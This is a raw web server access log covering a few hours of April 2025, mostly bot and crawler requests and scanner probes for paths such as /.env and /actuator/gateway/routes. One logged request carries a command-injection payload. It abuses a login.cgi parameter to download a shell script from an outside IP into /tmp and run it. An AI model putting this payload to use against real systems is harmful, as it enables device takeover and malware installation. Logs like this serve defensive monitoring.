151.106.164.42 - - [04/Apr/2025:23:22:18 +0200] "GET /cron.php?cron_type=tidy_cache&sid=dad0b351166ffb0a4351911a3393f802 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.42 - - [04/Apr/2025:23:22:18 +0200] "GET /cron.php?cron_type=tidy_cache&sid=dad0b351166ffb0a4351911a3393f802 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.42 - - [04/Apr/2025:23:22:18 +0200] "GET /cron.php?cron_type=tidy_cache&sid=dad0b351166ffb0a4351911a3393f802 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.181.99 - - [04/Apr/2025:23:28:38 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=112&sid=d8722c610946994e09586380e96a5549 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.181.99 - - [04/Apr/2025:23:28:38 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=112&sid=d8722c610946994e09586380e96a5549 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.181.99 - - [04/Apr/2025:23:28:38 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=112&sid=d8722c610946994e09586380e96a5549 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
20.65.193.67 - - [04/Apr/2025:23:29:46 +0200] "GET /hudson HTTP/1.1" 404 280 "-" "Mozilla/5.0 zgrab/0.x"
151.106.163.149 - - [04/Apr/2025:23:32:30 +0200] "GET /cron.php?cron_type=tidy_cache&sid=137c1e8701b56f9c0424fa996a300149 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.163.149 - - [04/Apr/2025:23:32:30 +0200] "GET /cron.php?cron_type=tidy_cache&sid=137c1e8701b56f9c0424fa996a300149 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.163.149 - - [04/Apr/2025:23:32:30 +0200] "GET /cron.php?cron_type=tidy_cache&sid=137c1e8701b56f9c0424fa996a300149 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.176.244 - - [04/Apr/2025:23:33:22 +0200] "GET /cron.php?cron_type=tidy_cache&sid=192396fa1e68a1c0abae95febd6fc570 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.176.244 - - [04/Apr/2025:23:33:22 +0200] "GET /cron.php?cron_type=tidy_cache&sid=192396fa1e68a1c0abae95febd6fc570 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.176.244 - - [04/Apr/2025:23:33:23 +0200] "GET /cron.php?cron_type=tidy_cache&sid=192396fa1e68a1c0abae95febd6fc570 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.171.1 - - [04/Apr/2025:23:41:40 +0200] "GET /cron.php?cron_type=tidy_cache&sid=a959af9f1d6964a5e4731ced31ada382 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.171.1 - - [04/Apr/2025:23:41:41 +0200] "GET /cron.php?cron_type=tidy_cache&sid=a959af9f1d6964a5e4731ced31ada382 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.171.1 - - [04/Apr/2025:23:41:41 +0200] "GET /cron.php?cron_type=tidy_cache&sid=a959af9f1d6964a5e4731ced31ada382 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.169.76 - - [04/Apr/2025:23:57:05 +0200] "GET /download/file.php?id=256&sid=2683d9dd381f3fcaaff06c36a17affcd HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.169.76 - - [04/Apr/2025:23:57:05 +0200] "GET /download/file.php?id=256&sid=2683d9dd381f3fcaaff06c36a17affcd HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.169.76 - - [04/Apr/2025:23:57:05 +0200] "GET /download/file.php?id=256&sid=2683d9dd381f3fcaaff06c36a17affcd HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.135 - - [05/Apr/2025:00:00:58 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11306518.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
154.81.156.35 - - [05/Apr/2025:00:02:04 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
47.89.154.16 - - [05/Apr/2025:00:06:48 +0200] "\x16\x03\x01" 400 383 "-" "-"
151.106.164.42 - - [05/Apr/2025:00:09:58 +0200] "GET /cron.php?cron_type=tidy_cache&sid=7c0a8e6c42b55747b762f0fd80a5ef88 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.42 - - [05/Apr/2025:00:09:59 +0200] "GET /cron.php?cron_type=tidy_cache&sid=7c0a8e6c42b55747b762f0fd80a5ef88 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.42 - - [05/Apr/2025:00:09:59 +0200] "GET /cron.php?cron_type=tidy_cache&sid=7c0a8e6c42b55747b762f0fd80a5ef88 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.135 - - [05/Apr/2025:00:10:31 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10553711.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
43.130.150.80 - - [05/Apr/2025:00:10:41 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
92.255.57.58 - - [05/Apr/2025:00:11:11 +0200] "GET /actuator/gateway/routes HTTP/1.1" 404 293 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36"
151.106.164.53 - - [05/Apr/2025:00:17:27 +0200] "GET /download/file.php?id=239&sid=95fcf3e7d8f83ae118ad401c78b781e4 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.53 - - [05/Apr/2025:00:17:28 +0200] "GET /download/file.php?id=239&sid=95fcf3e7d8f83ae118ad401c78b781e4 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.53 - - [05/Apr/2025:00:17:28 +0200] "GET /download/file.php?id=239&sid=95fcf3e7d8f83ae118ad401c78b781e4 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.183.52 - - [05/Apr/2025:00:18:06 +0200] "GET /cron.php?cron_type=tidy_cache&sid=1c3e328a87739a698924827517100f69 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.183.52 - - [05/Apr/2025:00:18:07 +0200] "GET /cron.php?cron_type=tidy_cache&sid=1c3e328a87739a698924827517100f69 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.183.52 - - [05/Apr/2025:00:18:07 +0200] "GET /cron.php?cron_type=tidy_cache&sid=1c3e328a87739a698924827517100f69 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.181.25 - - [05/Apr/2025:00:18:13 +0200] "GET /download/file.php?id=244&sid=da4bd8cf4628319db62eb63787edff54 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.181.25 - - [05/Apr/2025:00:18:14 +0200] "GET /download/file.php?id=244&sid=da4bd8cf4628319db62eb63787edff54 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.181.25 - - [05/Apr/2025:00:18:14 +0200] "GET /download/file.php?id=244&sid=da4bd8cf4628319db62eb63787edff54 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
103.99.3.62 - - [05/Apr/2025:00:18:49 +0200] "GET /.env HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
103.99.3.62 - - [05/Apr/2025:00:18:50 +0200] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30"
151.106.180.26 - - [05/Apr/2025:00:21:16 +0200] "GET /download/file.php?id=255&sid=06fb7f26c015bcfb28a4feacd7bb96de HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.180.26 - - [05/Apr/2025:00:21:16 +0200] "GET /download/file.php?id=255&sid=06fb7f26c015bcfb28a4feacd7bb96de HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.180.26 - - [05/Apr/2025:00:21:16 +0200] "GET /download/file.php?id=255&sid=06fb7f26c015bcfb28a4feacd7bb96de HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.135 - - [05/Apr/2025:00:52:24 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11046056.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
92.255.57.58 - - [05/Apr/2025:00:53:37 +0200] "\x16\x03\x01\x05\xa8\x01" 400 383 "-" "-"
151.106.165.204 - - [05/Apr/2025:01:04:52 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=113&sid=ba9aa32efebca7190ef7f73342cbbe84 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.165.204 - - [05/Apr/2025:01:04:52 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=113&sid=ba9aa32efebca7190ef7f73342cbbe84 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.165.204 - - [05/Apr/2025:01:04:52 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=113&sid=ba9aa32efebca7190ef7f73342cbbe84 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.169.235 - - [05/Apr/2025:01:09:23 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=112&sid=9e7d5da2ede94dfcdaea7a01f07758e7 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.169.235 - - [05/Apr/2025:01:09:23 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=112&sid=9e7d5da2ede94dfcdaea7a01f07758e7 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.169.235 - - [05/Apr/2025:01:09:24 +0200] "GET /gallery/image.php?mode=thumbnail&album_id=1&image_id=112&sid=9e7d5da2ede94dfcdaea7a01f07758e7 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
196.251.85.238 - - [05/Apr/2025:01:10:57 +0200] "GET /login.rsp HTTP/1.1" 404 354 "-" "Hello World"
151.106.168.134 - - [05/Apr/2025:01:11:54 +0200] "GET /cron.php?cron_type=tidy_warnings&sid=4a7a16bbcd8bdd708f0368378fe1a371 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.168.134 - - [05/Apr/2025:01:11:55 +0200] "GET /cron.php?cron_type=tidy_warnings&sid=4a7a16bbcd8bdd708f0368378fe1a371 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.168.134 - - [05/Apr/2025:01:11:55 +0200] "GET /cron.php?cron_type=tidy_warnings&sid=4a7a16bbcd8bdd708f0368378fe1a371 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
20.150.202.209 - - [05/Apr/2025:01:13:19 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 zgrab/0.x"
151.106.183.52 - - [05/Apr/2025:01:16:09 +0200] "GET /cron.php?cron_type=tidy_cache&sid=321c9d768844b7dc4390e3ccfafac197 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.183.52 - - [05/Apr/2025:01:16:09 +0200] "GET /cron.php?cron_type=tidy_cache&sid=321c9d768844b7dc4390e3ccfafac197 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.183.52 - - [05/Apr/2025:01:16:10 +0200] "GET /cron.php?cron_type=tidy_cache&sid=321c9d768844b7dc4390e3ccfafac197 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.181.25 - - [05/Apr/2025:01:27:57 +0200] "GET /cron.php?cron_type=tidy_cache&sid=986002768bfe97a53647929cac7b8384 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.181.25 - - [05/Apr/2025:01:27:57 +0200] "GET /cron.php?cron_type=tidy_cache&sid=986002768bfe97a53647929cac7b8384 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.181.25 - - [05/Apr/2025:01:27:57 +0200] "GET /cron.php?cron_type=tidy_cache&sid=986002768bfe97a53647929cac7b8384 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
195.184.76.2 - - [05/Apr/2025:01:29:08 +0200] "\x16\x03\x03\x01\xa6\x01" 400 383 "-" "-"
195.184.76.225 - - [05/Apr/2025:01:29:11 +0200] "GET / HTTP/1.1" 200 423 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
109.205.213.198 - - [05/Apr/2025:01:31:16 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
195.184.76.210 - - [05/Apr/2025:01:37:12 +0200] "\x16\x03\x03\x01\xa6\x01" 400 383 "-" "-"
195.184.76.211 - - [05/Apr/2025:01:37:13 +0200] "GET /activities.ico HTTP/1.1" 200 1406 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:130.0) Gecko/20100101 Firefox/130.0"
151.106.164.42 - - [05/Apr/2025:01:38:33 +0200] "GET /download/file.php?id=255&sid=1cb7c3e965e64e68d4fb22da1ef815c9 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.42 - - [05/Apr/2025:01:38:34 +0200] "GET /download/file.php?id=255&sid=1cb7c3e965e64e68d4fb22da1ef815c9 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.164.42 - - [05/Apr/2025:01:38:34 +0200] "GET /download/file.php?id=255&sid=1cb7c3e965e64e68d4fb22da1ef815c9 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
154.81.156.35 - - [05/Apr/2025:01:45:26 +0200] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
156.59.198.136 - - [05/Apr/2025:01:45:37 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10404764.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
47.121.133.117 - - [05/Apr/2025:01:46:54 +0200] "GET /login.cgi?cli=aa%20aa%27;wget%20http://104.248.224.147/sh%20-O%20-%3E%20/tmp/kh;sh%20/tmp/kh%27$ HTTP/1.1" 400 296 "-" "Hakai/2.0"
151.106.181.99 - - [05/Apr/2025:01:48:23 +0200] "GET /cron.php?cron_type=tidy_cache&sid=31ad4cadb8234f1b2ae79d8324e2b37d HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.181.99 - - [05/Apr/2025:01:48:23 +0200] "GET /cron.php?cron_type=tidy_cache&sid=31ad4cadb8234f1b2ae79d8324e2b37d HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.181.99 - - [05/Apr/2025:01:48:23 +0200] "GET /cron.php?cron_type=tidy_cache&sid=31ad4cadb8234f1b2ae79d8324e2b37d HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.173.252 - - [05/Apr/2025:01:49:14 +0200] "GET /download/file.php?id=251&sid=f3fec9edac1a87ef3685d7d4e740b119 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.173.252 - - [05/Apr/2025:01:49:15 +0200] "GET /download/file.php?id=251&sid=f3fec9edac1a87ef3685d7d4e740b119 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.173.252 - - [05/Apr/2025:01:49:15 +0200] "GET /download/file.php?id=251&sid=f3fec9edac1a87ef3685d7d4e740b119 HTTP/1.1" 404 297 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.181.25 - - [05/Apr/2025:01:51:29 +0200] "GET /cron.php?cron_type=tidy_cache&sid=cf50cbb85cbc8faaedde2e22a56efe26 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.181.25 - - [05/Apr/2025:01:51:30 +0200] "GET /cron.php?cron_type=tidy_cache&sid=cf50cbb85cbc8faaedde2e22a56efe26 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
151.106.181.25 - - [05/Apr/2025:01:51:30 +0200] "GET /cron.php?cron_type=tidy_cache&sid=cf50cbb85cbc8faaedde2e22a56efe26 HTTP/1.1" 404 290 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0"
156.59.198.136 - - [05/Apr/2025:01:55:00 +0200] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12397688.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"